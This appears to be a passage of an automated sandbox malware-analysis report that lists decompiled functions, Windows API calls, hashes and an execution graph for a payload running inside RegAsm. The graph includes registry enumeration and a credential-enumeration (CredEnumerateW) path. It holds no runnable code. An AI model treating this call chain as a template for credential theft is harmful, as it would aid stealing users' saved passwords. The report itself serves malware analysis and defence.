                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                      • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                      Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                                                                      • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                      Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                      Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                      • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                      Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                      • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                      Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                      • Opcode ID: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                                                                                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                      Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1961120804-0
                                                                                                                                                                                                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:3%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:21.8%
                                                                                                                                                                                                                      Signature Coverage:0.4%
                                                                                                                                                                                                                      Total number of Nodes:925
                                                                                                                                                                                                                      Total number of Limit Nodes:15
                                                                                                                                                                                                                      execution_graph 34241 40fc40 60 API calls 34416 403640 21 API calls 34242 427fa4 42 API calls 34417 412e43 _endthreadex 34418 425115 76 API calls __fprintf_l 34419 43fe40 133 API calls 34245 425115 83 API calls __fprintf_l 34246 401445 memcpy memcpy DialogBoxParamA 34247 440c40 34 API calls 33271 444c4a 33290 444e38 33271->33290 33273 444c56 GetModuleHandleA 33276 444c68 __set_app_type __p__fmode __p__commode 33273->33276 33275 444cfa 33277 444d02 __setusermatherr 33275->33277 33278 444d0e 33275->33278 33276->33275 33277->33278 33291 444e22 _controlfp 33278->33291 33280 444d13 _initterm __getmainargs _initterm 33281 444d6a GetStartupInfoA 33280->33281 33283 444d9e GetModuleHandleA 33281->33283 33292 40cf44 33283->33292 33287 444dcf _cexit 33289 444e04 33287->33289 33288 444dc8 exit 33288->33287 33290->33273 33291->33280 33343 404a99 LoadLibraryA 33292->33343 33294 40cf60 33295 40cf64 33294->33295 33349 410d0e 33294->33349 33295->33287 33295->33288 33297 40cf6f 33353 40ccd7 ??2@YAPAXI 33297->33353 33299 40cf9b 33367 407cbc 33299->33367 33304 40cfc4 33385 409825 memset 33304->33385 33305 40cfd8 33390 4096f4 memset 33305->33390 33310 40d181 ??3@YAXPAX 33312 40d1b3 33310->33312 33313 40d19f DeleteObject 33310->33313 33311 407e30 _strcmpi 33314 40cfee 33311->33314 33414 407948 free free 33312->33414 33313->33312 33316 40cff2 RegDeleteKeyA 33314->33316 33317 40d007 EnumResourceTypesA 33314->33317 33316->33310 33319 40d047 33317->33319 33320 40d02f MessageBoxA 33317->33320 33318 40d1c4 33415 4080d4 free 33318->33415 33321 40d0a0 CoInitialize 33319->33321 33395 40ce70 33319->33395 33320->33310 33412 40cc26 strncat memset RegisterClassA CreateWindowExA 33321->33412 33325 40d1cd 33416 407948 free free 33325->33416 33327 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33413 40c256 PostMessageA 33327->33413 33329 40d061 ??3@YAXPAX 33329->33312 33332 40d084 DeleteObject 33329->33332 33330 40d09e 33330->33321 33332->33312 33335 40d0f9 GetMessageA 33336 40d17b CoUninitialize 33335->33336 33338 40d10d 33335->33338 33336->33310 33337 40d113 TranslateAccelerator 33337->33338 33339 40d16d GetMessageA 33337->33339 33338->33337 33340 40d145 IsDialogMessage 33338->33340 33341 40d139 IsDialogMessage 33338->33341 33339->33336 33339->33337 33340->33339 33342 40d157 TranslateMessage DispatchMessageA 33340->33342 33341->33339 33341->33340 33342->33339 33344 404ae8 33343->33344 33348 404ac4 FreeLibrary 33343->33348 33346 404b13 33344->33346 33347 404afc MessageBoxA 33344->33347 33346->33294 33347->33294 33348->33344 33350 410d17 LoadLibraryA 33349->33350 33351 410d3c 33349->33351 33350->33351 33352 410d2b 33350->33352 33351->33297 33352->33351 33354 40cd08 ??2@YAPAXI 33353->33354 33356 40cd26 33354->33356 33357 40cd2d 33354->33357 33424 404025 6 API calls 33356->33424 33359 40cd66 33357->33359 33360 40cd59 DeleteObject 33357->33360 33417 407088 33359->33417 33360->33359 33362 40cd6b 33420 4019b5 33362->33420 33365 4019b5 strncat 33366 40cdbf _mbscpy 33365->33366 33366->33299 33426 407948 free free 33367->33426 33370 407cf7 33372 407a1f malloc memcpy free free 33370->33372 33373 407ddc 33370->33373 33375 407d7a free 33370->33375 33380 407e04 33370->33380 33427 40796e strlen 33370->33427 33440 406f30 33370->33440 33372->33370 33373->33380 33448 407a1f 33373->33448 33375->33370 33379 40796e 7 API calls 33379->33380 33437 407a55 33380->33437 33381 407e30 33382 407e38 33381->33382 33384 407e57 33381->33384 33383 407e41 _strcmpi 33382->33383 33382->33384 33383->33382 33383->33384 33384->33304 33384->33305 33453 4097ff 33385->33453 33387 409854 33458 409731 33387->33458 33391 4097ff 3 API calls 33390->33391 33392 409723 33391->33392 33478 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33392->33478 33394 40972b 33394->33311 33479 4023b2 33395->33479 33400 40ced3 33569 40cdda 7 API calls 33400->33569 33401 40cece 33405 40cf3f 33401->33405 33520 40c3d0 memset GetModuleFileNameA strrchr 33401->33520 33405->33329 33405->33330 33408 40ceed 33548 40affa 33408->33548 33412->33327 33413->33335 33414->33318 33415->33325 33416->33295 33425 406fc7 memset _mbscpy 33417->33425 33419 40709f CreateFontIndirectA 33419->33362 33421 4019e1 33420->33421 33422 4019c2 strncat 33421->33422 33423 4019e5 memset LoadIconA 33421->33423 33422->33421 33423->33365 33424->33357 33425->33419 33426->33370 33428 4079a1 33427->33428 33429 407998 free 33427->33429 33431 406f30 3 API calls 33428->33431 33430 4079ab 33429->33430 33432 4079c4 33430->33432 33433 4079bb free 33430->33433 33431->33430 33435 406f30 3 API calls 33432->33435 33434 4079d0 memcpy 33433->33434 33434->33370 33436 4079cf 33435->33436 33436->33434 33438 407a65 33437->33438 33439 407a5b free 33437->33439 33438->33381 33439->33438 33441 406f37 malloc 33440->33441 33442 406f7d 33440->33442 33444 406f73 33441->33444 33445 406f58 33441->33445 33442->33370 33444->33370 33446 406f6c free 33445->33446 33447 406f5c memcpy 33445->33447 33446->33444 33447->33446 33449 407a38 33448->33449 33450 407a2d free 33448->33450 33451 406f30 3 API calls 33449->33451 33452 407a43 33450->33452 33451->33452 33452->33379 33469 406f96 GetModuleFileNameA 33453->33469 33455 409805 strrchr 33456 409814 33455->33456 33457 409817 _mbscat 33455->33457 33456->33457 33457->33387 33470 44b090 33458->33470 33460 40973e _mbscpy _mbscpy 33472 40930c 33460->33472 33463 40930c 3 API calls 33464 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33463->33464 33465 4097c5 LoadStringA 33464->33465 33466 4097db 33465->33466 33466->33465 33468 4097f3 33466->33468 33477 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33466->33477 33468->33310 33469->33455 33471 44b097 33470->33471 33471->33460 33471->33471 33473 44b090 33472->33473 33474 409319 memset GetPrivateProfileStringA 33473->33474 33475 409374 33474->33475 33476 409364 WritePrivateProfileStringA 33474->33476 33475->33463 33476->33475 33477->33466 33478->33394 33571 409c1c 33479->33571 33482 401e69 memset 33610 410dbb 33482->33610 33485 401ec2 33641 4070e3 strlen _mbscat _mbscpy _mbscat 33485->33641 33486 401ed4 33626 406f81 GetFileAttributesA 33486->33626 33489 401ee6 strlen strlen 33491 401f15 33489->33491 33492 401f28 33489->33492 33642 4070e3 strlen _mbscat _mbscpy _mbscat 33491->33642 33627 406f81 GetFileAttributesA 33492->33627 33495 401f35 33628 401c31 33495->33628 33498 401f75 33640 410a9c RegOpenKeyExA 33498->33640 33499 401c31 7 API calls 33499->33498 33501 401f91 33502 402187 33501->33502 33503 401f9c memset 33501->33503 33505 402195 ExpandEnvironmentStringsA 33502->33505 33506 4021a8 _strcmpi 33502->33506 33643 410b62 RegEnumKeyExA 33503->33643 33652 406f81 GetFileAttributesA 33505->33652 33506->33400 33506->33401 33508 40217e RegCloseKey 33508->33502 33509 401fd9 atoi 33510 401fef memset memset sprintf 33509->33510 33513 401fc9 33509->33513 33644 410b1e 33510->33644 33513->33508 33513->33509 33514 402165 33513->33514 33515 402076 memset memset strlen strlen 33513->33515 33516 4070e3 strlen _mbscat _mbscpy _mbscat 33513->33516 33517 4020dd strlen strlen 33513->33517 33518 406f81 GetFileAttributesA 33513->33518 33519 402167 _mbscpy 33513->33519 33651 410b62 RegEnumKeyExA 33513->33651 33514->33508 33515->33513 33516->33513 33517->33513 33518->33513 33519->33508 33521 40c422 33520->33521 33522 40c425 _mbscat _mbscpy _mbscpy 33520->33522 33521->33522 33523 40c49d 33522->33523 33524 40c502 GetWindowPlacement 33523->33524 33525 40c512 33523->33525 33524->33525 33526 40c538 33525->33526 33673 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33525->33673 33666 409b31 33526->33666 33530 40ba28 33531 40ba87 33530->33531 33537 40ba3c 33530->33537 33676 406c62 LoadCursorA SetCursor 33531->33676 33533 40ba43 _mbsicmp 33533->33537 33534 40ba8c 33677 410a9c RegOpenKeyExA 33534->33677 33678 4107f1 33534->33678 33681 410808 33534->33681 33685 404734 33534->33685 33691 404785 33534->33691 33694 403c16 33534->33694 33535 40baa0 33536 407e30 _strcmpi 33535->33536 33540 40bab0 33536->33540 33537->33531 33537->33533 33767 40b5e5 10 API calls 33537->33767 33538 40bafa SetCursor 33538->33408 33540->33538 33541 40baf1 qsort 33540->33541 33541->33538 34225 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33548->34225 33550 40b00e 33551 40b016 33550->33551 33552 40b01f GetStdHandle 33550->33552 34226 406d1a CreateFileA 33551->34226 33554 40b01c 33552->33554 33555 40b035 33554->33555 33556 40b12d 33554->33556 34227 406c62 LoadCursorA SetCursor 33555->34227 34231 406d77 9 API calls 33556->34231 33559 40b136 33570 40c580 18 API calls 33559->33570 33560 40b087 33567 40b0a1 33560->33567 34229 40a699 12 API calls 33560->34229 33561 40b042 33561->33560 33561->33567 34228 40a57c strlen WriteFile 33561->34228 33564 40b0d6 33565 40b116 CloseHandle 33564->33565 33566 40b11f SetCursor 33564->33566 33565->33566 33566->33559 33567->33564 34230 406d77 9 API calls 33567->34230 33569->33401 33570->33405 33583 409a32 33571->33583 33574 409c80 memcpy memcpy 33577 409cda 33574->33577 33575 409d18 ??2@YAPAXI ??2@YAPAXI 33578 409d54 ??2@YAPAXI 33575->33578 33580 409d8b 33575->33580 33576 408db6 12 API calls 33576->33577 33577->33574 33577->33575 33577->33576 33578->33580 33580->33580 33593 409b9c 33580->33593 33582 4023c1 33582->33482 33584 409a44 33583->33584 33585 409a3d ??3@YAXPAX 33583->33585 33586 409a52 33584->33586 33587 409a4b ??3@YAXPAX 33584->33587 33585->33584 33588 409a63 33586->33588 33589 409a5c ??3@YAXPAX 33586->33589 33587->33586 33590 409a83 ??2@YAPAXI ??2@YAPAXI 33588->33590 33591 409a73 ??3@YAXPAX 33588->33591 33592 409a7c ??3@YAXPAX 33588->33592 33589->33588 33590->33574 33591->33592 33592->33590 33594 407a55 free 33593->33594 33595 409ba5 33594->33595 33596 407a55 free 33595->33596 33597 409bad 33596->33597 33598 407a55 free 33597->33598 33599 409bb5 33598->33599 33600 407a55 free 33599->33600 33601 409bbd 33600->33601 33602 407a1f 4 API calls 33601->33602 33603 409bd0 33602->33603 33604 407a1f 4 API calls 33603->33604 33605 409bda 33604->33605 33606 407a1f 4 API calls 33605->33606 33607 409be4 33606->33607 33608 407a1f 4 API calls 33607->33608 33609 409bee 33608->33609 33609->33582 33611 410d0e LoadLibraryA 33610->33611 33612 410dca 33611->33612 33613 410dfd memset 33612->33613 33653 4070ae 33612->33653 33615 410e1d 33613->33615 33656 410a9c RegOpenKeyExA 33615->33656 33617 410dee SHGetSpecialFolderPathA 33620 401e9e strlen strlen 33617->33620 33619 410e4a 33621 410e7f _mbscpy 33619->33621 33657 410d3d _mbscpy 33619->33657 33620->33485 33620->33486 33621->33620 33623 410e5b 33658 410add RegQueryValueExA 33623->33658 33625 410e73 RegCloseKey 33625->33621 33626->33489 33627->33495 33659 410a9c RegOpenKeyExA 33628->33659 33630 401c4c 33631 401cad 33630->33631 33660 410add RegQueryValueExA 33630->33660 33631->33498 33631->33499 33633 401c6a 33634 401c71 strchr 33633->33634 33635 401ca4 RegCloseKey 33633->33635 33634->33635 33636 401c85 strchr 33634->33636 33635->33631 33636->33635 33637 401c94 33636->33637 33661 406f06 strlen 33637->33661 33639 401ca1 33639->33635 33640->33501 33641->33486 33642->33492 33643->33513 33664 410a9c RegOpenKeyExA 33644->33664 33646 410b34 33647 410b5d 33646->33647 33665 410add RegQueryValueExA 33646->33665 33647->33513 33649 410b4c RegCloseKey 33649->33647 33651->33513 33652->33506 33654 4070bd GetVersionExA 33653->33654 33655 4070ce 33653->33655 33654->33655 33655->33613 33655->33617 33656->33619 33657->33623 33658->33625 33659->33630 33660->33633 33662 406f17 33661->33662 33663 406f1a memcpy 33661->33663 33662->33663 33663->33639 33664->33646 33665->33649 33667 409b40 33666->33667 33669 409b4e 33666->33669 33674 409901 memset SendMessageA 33667->33674 33670 409b99 33669->33670 33671 409b8b 33669->33671 33670->33530 33675 409868 SendMessageA 33671->33675 33673->33526 33674->33669 33675->33670 33676->33534 33677->33535 33679 410807 33678->33679 33680 4107fc FreeLibrary 33678->33680 33679->33535 33680->33679 33682 410816 33681->33682 33683 4107f1 FreeLibrary 33682->33683 33684 410825 33683->33684 33684->33535 33686 404785 FreeLibrary 33685->33686 33687 40473b LoadLibraryA 33686->33687 33689 40474c 33687->33689 33688 404781 33688->33535 33689->33688 33690 404785 FreeLibrary 33689->33690 33690->33688 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33535 33693->33692 33695 4107f1 FreeLibrary 33694->33695 33696 403c30 LoadLibraryA 33695->33696 33697 403c44 33696->33697 33698 4107f1 FreeLibrary 33697->33698 33699 403c6b 33697->33699 33698->33699 33700 404734 2 API calls 33699->33700 33701 403c86 33700->33701 33768 4036e5 33701->33768 33704 4036e5 27 API calls 33705 403c9a 33704->33705 33706 4036e5 27 API calls 33705->33706 33707 403ca4 33706->33707 33708 4036e5 27 API calls 33707->33708 33709 403cae 33708->33709 33780 4085d2 33709->33780 33717 403ce5 33718 403cf7 33717->33718 33968 402bd1 40 API calls 33717->33968 33828 410a9c RegOpenKeyExA 33718->33828 33721 403d0a 33722 403d1c 33721->33722 33969 402bd1 40 API calls 33721->33969 33829 402c5d 33722->33829 33726 4070ae GetVersionExA 33727 403d31 33726->33727 33847 410a9c RegOpenKeyExA 33727->33847 33729 403d51 33730 403d61 33729->33730 33848 402b22 memset 33729->33848 33857 410a9c RegOpenKeyExA 33730->33857 33733 403d87 33734 403d97 33733->33734 33735 402b22 47 API calls 33733->33735 33858 410a9c RegOpenKeyExA 33734->33858 33735->33734 33737 403dbd 33738 403dcd 33737->33738 33739 402b22 47 API calls 33737->33739 33740 410808 FreeLibrary 33738->33740 33739->33738 33741 403ddd 33740->33741 33742 404785 FreeLibrary 33741->33742 33743 403de8 33742->33743 33859 402fdb 33743->33859 33746 402fdb 34 API calls 33747 403e00 33746->33747 33875 4032b7 33747->33875 33756 403e3b 33757 403e73 33756->33757 33758 403e46 _mbscpy 33756->33758 33922 40fb00 33757->33922 33971 40f334 324 API calls 33758->33971 33767->33537 33769 4036fb 33768->33769 33772 4037c5 33768->33772 33972 410863 UuidFromStringA UuidFromStringA 33769->33972 33772->33704 33773 403716 strchr 33773->33772 33774 403730 33773->33774 33976 4021b6 memset 33774->33976 33776 40373f _mbscpy _mbscpy strlen 33777 4037a4 _mbscpy 33776->33777 33778 403789 sprintf 33776->33778 33977 4023e5 16 API calls 33777->33977 33778->33777 33781 4085e2 33780->33781 33978 4082cd 11 API calls 33781->33978 33785 408600 33786 403cba 33785->33786 33787 40860b memset 33785->33787 33798 40821d 33786->33798 33981 410b62 RegEnumKeyExA 33787->33981 33789 4086d2 RegCloseKey 33789->33786 33791 408637 33791->33789 33792 40865c memset 33791->33792 33982 410a9c RegOpenKeyExA 33791->33982 33985 410b62 RegEnumKeyExA 33791->33985 33983 410add RegQueryValueExA 33792->33983 33795 408694 33984 40848b 9 API calls 33795->33984 33797 4086ab RegCloseKey 33797->33791 33986 410a9c RegOpenKeyExA 33798->33986 33800 40823f 33801 403cc6 33800->33801 33802 408246 memset 33800->33802 33810 4086e0 33801->33810 33987 410b62 RegEnumKeyExA 33802->33987 33804 40826f 33805 4082bf RegCloseKey 33804->33805 33988 410a9c RegOpenKeyExA 33804->33988 33989 4080ed 10 API calls 33804->33989 33990 410b62 RegEnumKeyExA 33804->33990 33805->33801 33809 4082a2 RegCloseKey 33809->33804 33991 4045db 33810->33991 33814 40872d 33817 408737 wcslen 33814->33817 33818 4088ef 33814->33818 33816 40872b CredEnumerateW 33816->33814 33817->33818 33824 40876a 33817->33824 33997 404656 33818->33997 33819 40877a wcsncmp 33819->33824 33821 404734 2 API calls 33821->33824 33822 404785 FreeLibrary 33822->33824 33823 408812 memset 33823->33824 33825 40883c memcpy wcschr 33823->33825 33824->33818 33824->33819 33824->33821 33824->33822 33824->33823 33824->33825 33826 4088c3 LocalFree 33824->33826 34000 40466b _mbscpy 33824->34000 33825->33824 33826->33824 33827 410a9c RegOpenKeyExA 33827->33717 33828->33721 34001 410a9c RegOpenKeyExA 33829->34001 33831 402c7a 33832 402da5 33831->33832 33833 402c87 memset 33831->33833 33832->33726 34002 410b62 RegEnumKeyExA 33833->34002 33835 402d9c RegCloseKey 33835->33832 33836 410b1e 3 API calls 33837 402ce4 memset sprintf 33836->33837 34003 410a9c RegOpenKeyExA 33837->34003 33839 402d28 33840 402d3a sprintf 33839->33840 34006 402bd1 40 API calls 33839->34006 34004 410a9c RegOpenKeyExA 33840->34004 33845 402cb2 33845->33835 33845->33836 33846 402d9a 33845->33846 34005 410b62 RegEnumKeyExA 33845->34005 34007 402bd1 40 API calls 33845->34007 33846->33835 33847->33729 34008 410b62 RegEnumKeyExA 33848->34008 33850 402bbb RegCloseKey 33850->33730 33851 406f06 2 API calls 33853 402b58 33851->33853 33853->33850 33853->33851 33856 402bb8 33853->33856 34009 410a9c RegOpenKeyExA 33853->34009 34010 402a9d memset 33853->34010 34018 410b62 RegEnumKeyExA 33853->34018 33856->33850 33857->33733 33858->33737 34058 410a9c RegOpenKeyExA 33859->34058 33861 402ff9 33862 403006 memset 33861->33862 33863 40312c 33861->33863 34059 410b62 RegEnumKeyExA 33862->34059 33863->33746 33865 403122 RegCloseKey 33865->33863 33866 410b1e 3 API calls 33867 403058 memset sprintf 33866->33867 34060 410a9c RegOpenKeyExA 33867->34060 33869 4030a2 memset 34061 410b62 RegEnumKeyExA 33869->34061 33871 4030f9 